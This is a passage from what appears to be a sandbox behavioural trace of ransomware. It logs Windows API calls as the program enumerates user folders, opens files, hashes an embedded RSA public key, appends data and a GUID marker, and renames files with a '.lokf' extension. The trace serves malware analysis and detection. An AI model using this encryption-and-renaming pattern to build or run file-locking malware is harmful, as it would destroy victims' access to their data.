lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.391] CloseHandle (hObject=0x5cc) returned 1 [0059.392] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adce0 [0059.392] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8a0) returned 0x3268798 [0059.392] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\gg9DmOuSzgeAHjPyg_oR.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nxkfkpmd\\gg9dmouszgeahjpyg_or.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\gg9DmOuSzgeAHjPyg_oR.mp3.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nxkfkpmd\\gg9dmouszgeahjpyg_or.mp3.lokf")) returned 1 [0059.393] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f4137e0, ftCreationTime.dwHighDateTime=0x1d4cd2e, ftLastAccessTime.dwLowDateTime=0x1b446770, ftLastAccessTime.dwHighDateTime=0x1d4c988, ftLastWriteTime.dwLowDateTime=0x1b446770, ftLastWriteTime.dwHighDateTime=0x1d4c988, nFileSizeHigh=0x0, nFileSizeLow=0x7206, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zI78.png", cAlternateFileName="")) returned 1 [0059.393] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329b930 [0059.393] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8e) returned 0x32adb18 [0059.393] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\zI78.png") returned=".png" [0059.393] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\zI78.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nxkfkpmd\\zi78.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.393] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=29190) returned 1 [0059.393] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0059.396] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x71e0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.396] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0059.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0059.397] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x7206, lpOverlapped=0x0) returned 1 [0059.397] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.397] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0059.397] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.397] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0059.397] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8a50) returned 1 [0059.398] CryptCreateHash (in: hProv=0x6b8a50, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0059.398] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0059.398] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0059.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0059.398] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0059.398] GetLastError () returned 0x0 [0059.398] CryptDestroyHash (hHash=0x327cb80) returned 1 [0059.398] CryptReleaseContext (hProv=0x6b8a50, dwFlags=0x0) returned 1 [0059.398] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0059.398] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0059.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0059.398] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0059.398] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0059.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x3297a68 [0059.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6a0 | out: hHeap=0x660000) returned 1 [0059.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6b8 | out: hHeap=0x660000) returned 1 [0059.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0059.398] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0059.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c6ac68 [0059.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0059.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c6b6b8 [0059.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0059.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c6b6a0 [0059.398] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0059.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0059.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0059.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0059.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0059.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0059.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0059.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0059.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0059.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6b8 | out: hHeap=0x660000) returned 1 [0059.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0059.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6b6a0 | out: hHeap=0x660000) returned 1 [0059.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0059.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c6ac68 | out: hHeap=0x660000) returned 1 [0059.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296560 | out: hHeap=0x660000) returned 1 [0059.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0059.399] GetCurrentThreadId () returned 0x9e0 [0059.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f4e8 [0059.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c83b18 [0059.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0059.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8a50 [0059.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0059.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0059.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0059.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.399] GetCurrentThreadId () returned 0x9e0 [0059.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0059.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.399] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.399] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0059.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0059.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0059.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0059.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0059.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0059.400] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0059.400] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x7206, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0059.400] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f4e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f4e8*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0059.400] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f4e8 | out: hHeap=0x660000) returned 1 [0059.400] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0059.400] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0059.400] CloseHandle (hObject=0x5cc) returned 1 [0059.401] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\zI78.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nxkfkpmd\\zi78.png"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NxkfKpMd\\zI78.png.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nxkfkpmd\\zi78.png.lokf")) returned 1 [0059.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.401] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0059.402] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0059.402] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adb18 | out: hHeap=0x660000) returned 1 [0059.402] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f4137e0, ftCreationTime.dwHighDateTime=0x1d4cd2e, ftLastAccessTime.dwLowDateTime=0x1b446770, ftLastAccessTime.dwHighDateTime=0x1d4c988, ftLastWriteTime.dwLowDateTime=0x1b446770, ftLastWriteTime.dwHighDateTime=0x1d4c988, nFileSizeHigh=0x0, nFileSizeLow=0x7206, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zI78.png", cAlternateFileName="")) returned 0 [0059.402] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0059.403] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0059.403] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329b588 | out: hHeap=0x660000) returned 1 [0059.403] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.403] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.403] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\") returned="My Music\\" [0059.403] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0059.403] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0059.403] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0059.403] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.403] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0059.403] PathFindFileNameW (pszPath="") returned="" [0059.403] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Music\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f4137e0, ftCreationTime.dwHighDateTime=0x1d4cd2e, ftLastAccessTime.dwLowDateTime=0x1b446770, ftLastAccessTime.dwHighDateTime=0x1d4c988, ftLastWriteTime.dwLowDateTime=0x1b446770, ftLastWriteTime.dwHighDateTime=0x1d4c988, nFileSizeHigh=0x0, nFileSizeLow=0x7206, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zI78.png", cAlternateFileName="")) returned 0xffffffff [0059.403] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.403] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0059.403] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269928 | out: hHeap=0x660000) returned 1 [0059.403] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.403] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.403] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\") returned="My Pictures\\" [0059.403] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0059.404] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0059.404] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0059.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.404] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0059.404] PathFindFileNameW (pszPath="") returned="" [0059.404] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Pictures\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f4137e0, ftCreationTime.dwHighDateTime=0x1d4cd2e, ftLastAccessTime.dwLowDateTime=0x1b446770, ftLastAccessTime.dwHighDateTime=0x1d4c988, ftLastWriteTime.dwLowDateTime=0x1b446770, ftLastWriteTime.dwHighDateTime=0x1d4c988, nFileSizeHigh=0x0, nFileSizeLow=0x7206, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zI78.png", cAlternateFileName="")) returned 0xffffffff [0059.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0059.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269928 | out: hHeap=0x660000) returned 1 [0059.404] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.404] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0059.404] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\") returned="My Shapes\\" [0059.404] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0059.404] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0059.404] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0059.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0059.404] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0059.404] PathFindFileNameW (pszPath="") returned="" [0059.404] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0059.404] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32699a0 | out: hHeap=0x660000) returned 1 [0059.404] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0059.405] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0059.405] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini") returned=".ini" [0059.405] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201650 | out: hHeap=0x660000) returned 1 [0059.405] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0059.405] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss") returned=".vss" [0059.405] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0059.406] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=0) returned 1 [0059.406] CloseHandle (hObject=0x5cc) returned 1 [0059.406] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss.lokf")) returned 1 [0059.406] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0059.406] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201650 | out: hHeap=0x660000) returned 1 [0059.406] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 1 [0059.406] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_private", cAlternateFileName="")) returned 0 [0059.406] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0059.407] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32575c0 | out: hHeap=0x660000) returned 1 [0059.407] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3269928 | out: hHeap=0x660000) returned 1 [0059.407] PeekMessageW (in: lpMsg=0x9f4ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4ff08) returned 0 [0059.407] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 